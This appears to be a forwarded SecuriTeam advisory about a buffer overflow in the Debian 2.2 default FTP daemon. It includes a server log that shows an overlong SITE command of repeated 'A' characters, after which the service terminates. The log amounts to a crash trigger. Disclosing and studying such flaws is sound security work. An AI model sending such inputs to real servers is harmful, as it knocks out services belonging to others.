> SecuriTeam web site: http://www.securiteam.com > > Debian FTP Daemon Vulnerable to Buffer Overflow (SITE) > ------------------------------------------------------------------------ > > SUMMARY > > A security vulnerability in Debian FTP Daemon has been discovered. The > vulnerability arises when a buffer of 400 bytes or more is sent to the > FTPd daemon in a SITE command. > > DETAILS > > Vulnerable systems: > Debian 2.2 is 2.2r3 default FTPd daemon Version 6.2/OpenBSD/Linux-0.10 > > Example: > May 18 12:32:46 ts ftpd[677]: ts FTP server (Version > 6.2/OpenBSD/Linux-0.10) ready. > May 18 12:32:47 ts ftpd[677]: command: SITE > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA > May 18 12:32:47 ts ftpd[677]: <--- 500 > May 18 12:32:47 ts ftpd[677]: 'SITE > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA > ': command not understood. > May 18 12:32:47 ts ftpd[677]: <--- 221 > May 18 12:32:47 ts ftpd[677]: You could at least say goodbye. > May 18 12:32:47 ts inetd[139]: ftp/tcp server failing (looping), service > terminated > > > ADDITIONAL INFORMATION > > The information has been provided by <mailto:[EMAIL PROTECTED]> > Tamer Sahin.
[ ]'s *************************** .''`. * [EMAIL PROTECTED] * : :' : * www.hackhour.com.br * `. `'` * Hack Hour Inc. * `- *************************** Debian